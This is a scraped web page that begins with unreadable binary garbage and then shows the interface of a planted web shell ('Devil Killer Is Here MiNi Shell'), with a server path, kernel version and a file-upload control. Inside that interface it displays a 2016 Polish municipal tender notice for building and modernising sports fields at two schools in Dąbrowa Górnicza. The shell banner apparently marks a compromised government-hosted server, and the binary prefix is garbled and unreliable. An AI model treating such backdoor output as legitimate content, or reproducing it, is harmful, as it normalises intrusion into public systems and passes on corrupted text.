JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160719/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160719/142307-N-2016.html

<p class="kh_header"><b>Dąbrowa Górnicza: ZADANIE A:
Nowoczesne boisko  przy Szkole Podstawowej nr 2. 
ZADANIE B:
Modernizacja boiska przy Szkole Podstawowej nr 11</b><br>
<b>Numer ogłoszenia: 142307 - 2016; data zamieszczenia: 19.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dąbrowa Górnicza , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 32 2956700, faks 32 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZADANIE A:
Nowoczesne boisko  przy Szkole Podstawowej nr 2. 
ZADANIE B:
Modernizacja boiska przy Szkole Podstawowej nr 11.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postępowanie o udzielenie zamówienia prowadzone jest w trybie przetargu nieograniczonego na podstawie ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t.j. Dz.U. z 2015r., poz. 2164) o wartości zamówienia poniżej 5.225.000,00 EUR.
Opis przedmiotu zamówienia:

ZADANIE A:
 Nowoczesne boisko  przy Szkole Podstawowej nr 2.  
1. Przedmiotem zamówienia jest: Opracowanie dokumentacji projektowej na podstawie Programu Funkcjonalno - Użytkowego i wykonanie robót budowlanych tj; 

   Przebudowa istniejących boisk z nawierzchnią asfaltobetonową ograniczoną obrzeżami betonowymi 8 x 30 cm. Przebudowa boisk będzie polegała na wykonaniu: nowego boiska wielofunkcyjnego o wymiarach 42,00 x 23,00 m oraz boiska do siatkówki  o wymiarach 22,00  x 11,00 m, o  nawierzchni poliuretanowej, na istniejących boiskach  asfaltobetonowych  po uprzednim przygotowaniu istniejącej nawierzchni asfaltobetonowej, wykonaniu chodnika wzdłuż boiska wielofunkcyjnego i  wykonaniu piłkochwytów  przy boisku wielofunkcyjnym o wysokości h = 4,0 m   wraz z wykonaniem dokumentacji projektowej. 
   
2.Zagospodarowanie terenu istniejących boisk obejmuje wykonanie  projektu oraz robót budowlanych:
 
2.1.boiska wielofunkcyjnego o powierzchni 966,00 m2 do gry w piłkę ręczną (mini nożnej),piłkę koszykową  o nawierzchni syntetycznej poliuretanowej, 
2.2. boiska do piłki  siatkowej o powierzchni  242,00 m2  o nawierzchni syntetycznej poliuretanowej 
2.3. piłkochwytów do boiska wielofunkcyjnego o wysokości h= 4,0 m   
2.4. chodnika  z koski betonowej gr. 6 cm  na pow. 65,00 m2 ułożonego wzdłuż dłuższego boku boiska wielofunkcyjnego
2.5. małej architektury tj: 4 ławek  parkowych  i  2 koszy na śmieci.

3.Przedmiot zamówienia  winien zawierać  następujące parametry  techniczne:
 
3.1.boisko wielofunkcyjne: do piłki ręcznej (mini nożnej) i piłki koszykowej o wymiarach 42,00 x 23,00 m o nawierzchni syntetycznej poliuretanowej w kolorze ceglastym, zielonym i żółtym, mieszczące w swym obrysie:
- boisko do piłki ręcznej (mini nożnej) o polu gry 40,00x20,00 m, boisko wydzielone liniami  szer.  5 cm  i  wyposażone w dwie bramki 3x2 m,
- dwa boiska do piłki koszykowej o wymiarach 22,00x 14,00 ,boiska wydzielone liniami szer.  5 cm, boiska wyposażone w cztery stojaki do koszykówki,

3.2.boisko do siatkówki o pow.22,00x11,00 m, mieszczące w swym obrysie boisko o wymiarach 9,00 x 18,00m , boisko wydzielone liniami  szer. 5 cm w kolorze białym, nawierzchnia boiska   w kolorze ceglastym i zielonym, boisko wyposażone w  słupki do siatkówki (montowane w tulejach) z mechanizmem naciągowym i możliwością regulacji wysokości siatki. 


3.3.Nawierzchnia boiska wielofunkcyjnego winna być syntetyczna poliuretanowa w kolorze ceglastym, zielonym i żółtym, linie segregacyjne poszczególnych boisk szer. 5 cm malowane farbą systemową poliuretanową w następujących kolorach : boisko do piłki ręcznej (mini piłki nożnej) w kolorze białym, boiska do koszykówki w kolorze niebieskim. Boisko winno być wyposażone  w bramki do piłki ręcznej o konstrukcji stalowej i wymiarach 3,00x2,00 m, stojaki do koszykówki   o konstrukcji stalowej, wysięgu 1,65 m .
3.4.Nawierzchnia boiska do siatkówki winna być syntetyczna poliuretanowa w kolorze ceglastym  i zielonym, wydzielone liniami  szer. 5 cm w kolorze białym. Boisko wyposażone w  słupki do siatkówki  ( montowane w tulejach) z mechanizmem naciągowym i możliwością regulacji wysokości siatki. 

3.5. piłkochwyty : na szerokości boiska i na części  jednego dłuższego boku, należy zaprojektować i wykonać piłkochwyty o długości 2x23,00 m i wysokości 4,00m oraz długości 5,00 mb i wysokości  h =4,00 m.  Piłkochwyty systemowe z siatki polipropylenowej na słupach stalowych. 

3.6. chodnik:   wzdłuż dłuższego boku boiska wielofunkcyjnego należy zaprojektować i wykonać  chodnik z kostki betonowej gr. 6 cm na podsypce cementowo piaskowej   o  szer. 1,50 m, tj. 42,00 m x 1,50 m =   63,00 m2

3.7. ławki parkowe, kosze na śmieci:  w chodniku z koski betonowej należy zaprojektować   i zamontować  4 ławki parkowe bez oparcia o konstrukcji rurowej  z  siedziskami drewnianymi oraz  2 kosze na śmieci umieszczone między  ławkami. Ławki   i kosze montowane na stałe w podłożu. Istniejące ławki parkowe (6 szt) zamontowane  wzdłuż boiska do piłki siatkowej Wykonawca zobowiązany jest   wyremontować.


4.Przedmiot zamówienia winien zawierać  następujące rozwiązania konstrukcyjno-materiałowe podbudowy i nawierzchni boiska wielofunkcyjnego  oraz  boiska do siatkówki . 
4.1. Wykonawca  zobowiązany jest   istniejącą nawierzchnię  asfaltobetonową boisk  wykorzystać   jako podbudowę pod nową nawierzchnię syntetyczną.
4.2.  Istniejącą podbudowę asfaltobetonową należy przygotować wg. następującej  technologii :
- zniszczoną podbudowę asfaltobetonową boisk  należy rozebrać, usunąć luźne fragmenty asfaltobetonu z powierzchni  podbudowy,  wykonać naprawę    rys  i spękań,
- istniejące ubytki asfaltobetonu na boiskach należy  uzupełnić betonem B-20 na pełną grubość asfaltobetonu,
- na całej powierzchni boisk   wylać  płytę betonową z betonu B-25 o gr. min 10 cm,  z odpowiednim spadkiem w kierunku północno-zachodnim  (zachować  spadek istniejących  boisk asfaltobetonowych), 
- płytę boisk  ograniczyć nowymi obrzeżami betonowymi 8 x 30 cm, po uprzednim demontażu starych,
- wykonaną podbudowę betonową boisk zatrzeć na ostro, zdylatować (zgodnie ze sztuką budowlaną) i  wysezonowana,
-  wilgotność rzędu 3-5 %

4.3. Na tak  przygotowanej   podbudowie boisk  Wykonawca  zobowiązany jest wykonać nową nawierzchnię syntetyczną poliuretanową, dwuwarstwową typu natryskowego, składającą się z maty   elastomerowej gr. 10  mm  oraz  poliuretanowego natrysku gr. 3 mm,  w  kolorze ceglastym , zielonym i żółtym ( kolorystyka do uzgodnienia z użytkownikiem)

5. Wykonawca zobowiązany jest do zaprojektowania  i zamontowania   następującego sprzętu   sportowego  na boiskach.
a)  dwie  bramki  do  piłki  ręcznej o  wymiarach 3,00 x 2,00 m, o  konstrukcji  stalowej  z profilu        80 x 80 mm,  malowane  proszkowo,  montowane w tulejach  z  możliwością  demontażu   i zaślepienia tulei deklami o nawierzchni  tożsamej  z  nawierzchnią  boiska,  wyposażone  w siatki polietylenowe PE-4 gł. 0,8/1,0 m (produkt typowy). Wykonawca zobowiązany jest zamontować bramki zgodnie z zaleceniami producenta.
 
b)  cztery stojaki do koszykówki, stalowe cynkowane , montowane w tulei,  o wysięgu 1,60 m, wyposażone  w tablice stalowe ażurowe, cynkowane o wymiarach   1,05 x1,80 m   z  obejmą wzmocnioną cynkowaną i siatką łańcuszkową. Stojaki wyposażone w osłony słupów. Wykonawca zobowiązany jest zamontować stojaki zgodnie  z zaleceniami producenta.

c)  jeden komplet  słupków do siatkówki, aluminiowych  o profilu owalnym,  z mechanizmem   naciągu  i  regulacji  wysokości  siatki,  montowany  w tulejach z możliwością demontażu , wyposażony  w siatki turniejowe z antenkami wzmocnione taśmą z czterech stron (9.0x1.0 m) w kolorze białym ( produkt typowy ).Wykonawca zobowiązany jest zamontować  słupki  zgodnie z zaleceniami producenta. 

 

ZADANIE B:
Modernizacja boiska przy Szkole Podstawowej nr 11.  

1. Przedmiotem zamówienia jest:  Opracowanie dokumentacji projektowej na podstawie Programu Funkcjonalno - Użytkowego i wykonanie robót budowlanych tj; 

1.1. Przebudowa istniejącego boiska do piłki nożnej z nawierzchnią asfaltobetonową ograniczoną  obrzeżami betonowymi 8 x 30 cm.  Przebudowa boiska będzie polegała na wykonaniu nowego boiska wielofunkcyjnego o wymiarach 41,00 x 25,00 m o  nawierzchni poliuretanowej, na istniejącym boisku asfaltobetonowym po uprzednim przygotowaniu istniejącej nawierzchni asfaltobetonowej, wykonaniu chodnika wzdłuż boiska oraz wykonaniu piłkochwytów o wysokości  h = 4,0 m wraz z wykonaniem dokumentacji projektowej. 

1.2.  likwidacja istniejącego boiska do koszykówki  - zakres prac  będzie polegał  na mechanicznym rozebraniu  nawierzchni  asfaltobetonowej  o wymiarach  14,00 m x 25,00 m = 350 m2, demontażu  krawężników betonowych,  demontażu  dwóch  stojaków , wywozu gruzu wraz z opłatą za składowanie, humusowanie terenu po zlikwidowanym boisku i obsianie tego terenu  trawą.

2.Zagospodarowanie terenu istniejącego boiska obejmuje wykonanie projektu oraz robót budowlanych ; 

2.1.boiska wielofunkcyjnego  o pow.  1025,00  m2  do gry w piłkę ręczną  (mini nożną),  piłkę   koszykową  i piłkę  siatkową  o nawierzchni syntetycznej poliuretanowej, 

2. 2.piłkochwytów o wysokości  h = 4,0 m    

2.3. chodnika  z  koski  betonowej  gr.  6 cm   na  pow. 61,50 m2    ułożonego wzdłuż dłuższego boku boiska wielofunkcyjnego  

2.4. małej architektury tj.: 4  ławek  parkowych  i   2 koszy na śmieci,
 
3. Przedmiot zamówienia winien zawierać następujące  parametry techniczne:

3.1.boisko wielofunkcyjne: do piłki ręcznej (mini nożnej), piłki koszykowej i  piłki siatkowej o  wymiarach 41,00 x 25,00m o nawierzchni syntetycznej poliuretanowej w kolorze ceglastym, zielonym i żółtym, mieszczące w swym obrysie:
- boisko do piłki ręcznej (mini nożnej) o polu gry 40,00 x 20,00 m, boisko wydzielone liniami   szer.5 cm i  wyposażone w dwie bramki  3 x 2 m,
- boisko do piłki koszykowej o wymiarach  24,00 x 14,00 m,  boisko wydzielone liniami szer. 5 cm i wyposażone w dwa stojaki  do koszykówki 
- boisko do siatkówki o wymiarach 9,00 x 18,00 m, boisko wydzielone liniami  szer. 5 cm  i wyposażone w  słupki do siatkówki (montowane w tulejach) z mechanizmem naciągowym  i możliwością regulacji wysokości siatki. 

3.2. Nawierzchnia boiska wielofunkcyjnego winna być  syntetyczna poliuretanowa w kolorze ceglastym, zielonym  i żółtym, linie segregacyjne poszczególnych boisk szer. 5 cm malowane farbą systemową poliuretanową w następujących kolorach : boisko do piłki ręcznej (mini piłki nożnej) w kolorze białym, boisko do koszykówki w kolorze żółtym, boisko do siatkówki w kolorze niebieskim. Boisko winne być  wyposażone w bramki do piłki ręcznej o konstrukcji stalowej o wymiarach 3,00x2,00 m, stojaki do koszykówki o konstrukcji stalowej o wysięgu 1,60 m i słupki do siatkówki ( montowane w tulejach ) z mechanizmem naciągowym i możliwością regulacji wysokości siatki.

3.3. piłkochwyty: na szerokości boiska  należy zaprojektować i wykonać  piłkochwyty o długości  2 x25,00 m i wysokości 4,00 m. Piłkochwyty systemowe z siatki polipropylenowej na słupach stalowych. 

3.4. chodnik: wzdłuż dłuższego boku boiska wielofunkcyjnego należy zaprojektować i wykonać chodnik z kostki betonowej gr. 6 cm na podsypce cementowo piaskowej o szer.1,50 m tj.  41,00 m x 1,50 m = 61,50 m2

3.5  ławki parkowe, kosze na śmieci:  w  chodniku  z  koski  betonowej  należy zaprojektować   i   zamontować  4 ławki parkowe bez oparcia o konstrukcji rurowej z  siedziskami drewnianymi oraz   2 kosze na śmieci umieszczone między  ławkami. Ławki i kosze montowane na stałe w podłożu.


4. Przedmiot zamówienia winien zawierać następujące rozwiązania   konstrukcyjno-materiałowe podbudowy i nawierzchni  boiska wielofunkcyjnego  
4.1.Wykonawca zobowiązany jest istniejącą nawierzchnię  asfaltobetonową boiska wykorzystać jako obudowę  pod nową   nawierzchnię syntetyczną.
4.2. Istniejącą podbudowę asfaltobetonową należy przygotować wg. następującej  technologii :
- zniszczoną podbudowę asfaltobetonową należy rozebrać, usunąć luźne fragmenty asfaltobetonu z powierzchni  podbudowy, wykonać  naprawę  rys  i spękań,
- istniejące ubytki asfaltobetonu na boisku należy uzupełnić betonem B-20 na pełną grubość asfaltobetonu,
- na całej powierzchni boiska wylać płytę betonową z betonu B-25 o gr. min 10 cm, z odpowiednimi spadkami rzędu 0,5 % w kierunku poprzecznym, płytę ograniczyć nowymi obrzeżami betonowymi 8x30 cm, po uprzednim demontażu starych
- wykonaną podbudowę betonową boiska zatrzeć  na ostro, zdylatować (zgodnie ze sztuką budowlaną) i wysezonowana,
- wilgotność rzędu 3-5 %
 
4.3.Na tak przygotowanej podbudowie boiska Wykonawca zobowiązany jest wykonać nową nawierzchnię  syntetyczną   poliuretanową, dwuwarstwową   typu  natryskowego,  składającą się  z maty elastomerowej gr.10 mm oraz poliuretanowego natrysku gr. 3 mm, w kolorze ceglastym, zielonym i żółtym ( kolorystyka do uzgodnienia z użytkownikiem)

5. Wykonawca zobowiązany jest do zaprojektowania i zamontowania następującego  sprzętu  sportowego na boiskach 

a) dwie bramki do piłki ręcznej o wymiarach 3,00 x 2,00 m, konstrukcji stalowej z profilu 80x80 mm, malowane proszkowo, montowane w tulejach z możliwością demontażu i zaślepienia tulei deklami                            o nawierzchni tożsamej z nawierzchnią boiska, wyposażone w siatki polietylenowe PE-4 gł. 0,8/1,0 m (produkt typowy). Wykonawca zobowiązany jest zamontować bramki zgodnie z zaleceniami producenta.
 
b) dwa stojaki do koszykówki, stalowe cynkowane, montowane w tulei,  o wysięgu 1,60 m, wyposażone w tablice stalowe ażurowe, cynkowane o wymiarach 1,05 x1,80 m z obejmą wzmocnioną cynkowaną i siatką łańcuszkową. Stojaki wyposażone w osłony słupów. Wykonawca zobowiązany jest zamontować stojaki zgodnie z zaleceniami producenta.
 
c) jeden komplet  słupków do siatkówki, aluminiowych  o profilu owalnym,  z mechanizmem   naciągu  i  regulacji  wysokości  siatki,  montowany  w tulejach z możliwością demontażu, wyposażony  w siatki turniejowe z antenkami wzmocnione taśmą z czterech stron (9.0x1.0 m)  w kolorze białym ( produkt typowy ). Wykonawca zobowiązany jest zamontować  słupki  zgodnie z zaleceniami producenta. 
 



 
6. Wymagania ogólne dotyczące zadania:  A i B. 

6.1.Przedmiot zamówienia winien zawierać następujące parametry techniczne syntetycznej nawierzchni poliuretanowej   i wymagane rozwiązania konstrukcyjno-materiałowe nawierzchni:

 Nowa syntetyczna nawierzchnia sportowa boisk winna zostać  zaprojektowana i wykonana jako  nawierzchnia poliuretanowo-gumowa o grubości warstwy 13 mm - wersja podstawowa, wymagająca podbudowy asfaltobetonowej, betonowej lub podbudowy z mieszaniny kruszywa kwarcowego i granulatu gumowego połączonego lepiszczem poliuretanowym. Nawierzchnia ta winna być przepuszczalna dla wody, o zwartej strukturze, jak dla boisk wielofunkcyjnych, szkolnych.  Nawierzchnia będzie składać się  z dwóch warstw elastycznej (nośnej) i użytkowej. Warstwa nośna winna być  mieszaniną granulatu gumowego i  lepiszcza poliuretanowego. Układana mechanicznie, bezspoinowo przy pomocy rozkładarki mas poliuretanowych (np. Planomatic lub równoważny). Tak wykonaną warstwę należy pokryć warstwą użytkową, którą  stanowi system poliuretanowy  zmieszany z granulatem EPDM. Czynność tę należy wykonać  poprzez natrysk mechaniczny (przy użyciu specjalnej natryskarki np. firmy SMG). Grubość warstwy użytkowej 2 - 3 mm.  Po całkowitym związaniu mieszaniny są malowane linie farbami poliuretanowymi metodą natrysku.
 
6.2.   Wykonawca zobowiązany jest do zaprojektowania i wykonania  nawierzchni   poliuretanowej, która   powinna spełniać parametry nie gorsze niż opisane poniżej:

-Wytrzymałość na rozciąganie, ( N/mm2 ): większa lub równa 1,0 
-Odporność na działanie zmiennych cykli hydrotechnicznych oceniona:
a)	przyrostem masy ( % ): mniejsza lub równa 0,4
b)	zmianą wyglądu zewnętrznego: bez zmian
-Odporność nawierzchni na działanie butów z kolcami:
a)	spadek wytrzymałości na rozciąganie( % ): mniejszy lub równy 8,0 
b)	spadek wydłużenia przy zerwaniu( % ): mniejszy lub równy 6,0 
-Pionowe odbicie piłki (%): 90,0-105,0
-Wytrzymałość na rozdzieranie (N): większa lub równa  140
-Przyczepność do podkładu betonowego (MPa): większa lub równa 0,65 
-mrozoodporność oceniona : 
a)	przyrostem masy (%): mniejszy lub równy 0,5
b)	zmianą wyglądu zewnętrznego   - bez zmian 
-odporność na ścieranie wg metody Tabera (G): 0,4 - 0,7 
-przepuszczalność wody(mm/h):  większa lub równa  16000,0
-wydłużenie względne przy zerwaniu (%):  większe lub równe  45 
-tłumienie energii  23oC (%): 36-42
-twardość Shorea,A: 50,0 -70,0
-odporność po sztucznym  starzeniu
a)	odporność na zużycie(ścieranie Tabera),w(g): mniejsze lub równe 1,0
b)  zmiana barwy, stopnie skali szarości: 4
-odporność na działanie UV- zmiana barwy, nr skali szarej: 4 -5

Zawartość związków chemicznych  powinna być nie większa  niż opisana  poniżej: 
Zawartość metali ciężkich (mg/l):
-DOC -<10,0
-EOX(mm/kg) -< 6,0
-ołów (Pb)-< 0,002
-kadm (Cd)-< 0,0002
-chrom (Cr) łącznie -< 0,001
-chrom VI (Cr VI) -< 0,008
-rtęć (Hg)-< 0,001
-cynk (Zn)- < 0,06
-cyna (Sn)-< 0,03
-parafiny chlorowane - niewykrywalne 
-ftalany-niewykrywalne
 
6.3. Zastosowana  nawierzchnia poliuretanowa ma posiadać: 
 
-atest higieniczny  PZH dla nawierzchni lub dokument równoważny
-aktualne badania ekologiczne na zgodność z DIN V 18035- 6:2013 wydane przez akredytowane przez IAAF laboratorium, potwierdzające wymagane parametry w w/w zakresie zawartości metali ciężkich 
-autoryzację producenta nawierzchni  wystawioną w  oryginale  dla wykonawcy na  realizowaną inwestycję  wraz  z  potwierdzeniem gwarancji  udzielonej   przez   producenta  na  tę  nawierzchnię
-aktualną kompletną aprobatę techniczną ITB lub rekomendację techniczną ITB lub dokument równoważny, potwierdzający wszystkie parametry techniczne oferowanej nawierzchni wymagane przez Zamawiającego
-aktualny certyfikat IAAF dla oferowanej nawierzchni
-kartę techniczną nawierzchni potwierdzoną przez producenta systemu
- próbkę nawierzchni z metryczką producenta
-dokument potwierdzający spełnianie przez oferowaną nawierzchnię  wymagań normy  PN-EN      14877/2014.  
 
 6.4. Wszystkie dostarczone i zamontowane urządzenia sportowe i piłkochwyty muszą spełniać wymogi bezpieczeństwa i ergonomii, muszą być zgodne z normami lub dokumentami równoważnymi wprowadzonymi do obowiązkowego stosowania oraz wymaganiami określonymi w przepisach BHP oraz pozostałych przepisów prawa. Zastosowany sprzęt sportowy musi posiadać aktualne certyfikaty                     i  dopuszczenia do stosowania ze znakiem B.

6.5. Wykonawca jest odpowiedzialny za prowadzenie robót zgodnie z obowiązującymi przepisami, normami i wytycznymi producenta nawierzchni syntetycznej poliuretanowej, urządzeń sportowych                        i piłkochwytów oraz za ich zgodność  z przedmiotem zamówienia. Jednocześnie winien przestrzegać warunków umowy,  odpowiada za jakość zastosowanych materiałów  i wykonany montaż.

7. Roboty należy zrealizować na podstawie ;
-  programu funkcjonalno - użytkowego
- wymogów  Specyfikacji Istotnych Warunków Zamówienia  wraz z projektem umowy,
- zasad wiedzy technicznej , sztuki budowlanej  i przepisów prawa     


8. Zamówienie musi  być realizowane  zgodnie z:
Ustawą  z dnia 7 lipca  1994 roku  Prawo budowlane (Dz.U. z 2016 r. poz. 290 t.j.), Rozporządzeniem  Ministra Pracy i Polityki Socjalnej z dnia  26 września  1997 r. w sprawie ogólnych przepisów bezpieczeństwa  i higieny pracy ( Dz.U. z 2003 r. Nr 169,poz.1650 z późn. zm) 

9. Rozwiązania  równoważne :
1.	Wskazane w  SIWZ znaki towarowe, patenty i miejsce pochodzenia są uzasadnione  specyfikacją  przedmiotu  zamówienia i mają na celu  wskazanie jedynie jakości i parametrów przedmiotu zamówienia  z uwagi  nas brak innych dostatecznie dokładnych określeń, które pozwalałyby opisać przedmiot zamówienia  w tej części w sposób jednoznaczny  i wyczerpujący. W związku z powyższym Wykonawcy mogą składać oferty równoważne w stosunku do przedmiotu zamówienia przedstawionego w SIWZ - zgodnie z art. 30 ust.4 i 5 ustawą .

2.	W związku z tym :
2.1. Zamawiający dopuszcza zastosowanie materiałów i urządzeń równoważnych - tj. o parametrach jakościowych  nie gorszych niż określone w SIWZ - w odniesieniu  do materiałów i urządzeń , których pochodzenie zostało określone przez Zamawiającego  w SIWZ  nazwą producenta.
2.2. Zgodnie z art. 30 ust.5 ustawy Wykonawca, który powołuje się na rozwiązania równoważne  opisywanym przez Zamawiającego , jest obowiązany wykazać , że oferowane przez niego dostawy, usługi  lub roboty budowlane spełniają wymagania określone przez Zamawiającego. Równoważność pod względem parametrów technicznych, użytkowych oraz eksploatacyjnych  ma w szczególności  gwarantować realizację  robót w zgodzie z SIWZ i P.F.U. oraz zapewnić  uzyskanie parametrów  technicznych nie gorszych  od założonych w SIWZ.

10. Gwarancja i rękojmia :
Wykonawca udziela 36  miesiące gwarancji na wykonane roboty licząc od daty podpisania przez obie strony protokołu odbioru wykonania przedmiotu umowy . W okresie tym Wykonawca zobowiązuje się usunąć  wynikłe wady nieodpłatnie w terminie do pięciu  dni od daty zgłoszenia ich przez Zamawiającego. 
Na wykonane  roboty  Wykonawca  udziela  rękojmi  na  okres 36 miesięczny  licząc od daty podpisania  przez obie strony protokołu odbioru wykonania przedmiotu umowy. 

11. W przypadku zatrudnienia Wykonawcę personelu obcojęzycznego , 

Wykonawca zapewni ciągłą możliwość porozumiewania się personelu 
Zamawiającego z personelem Wykonawcy w języku polskim..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1, 45.11.12.00-0, 45.21.22.00-8, 45.34.20.00-6, 45.11.27.00-2, 45.23.32.22-1, 45.11.12.00-0, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
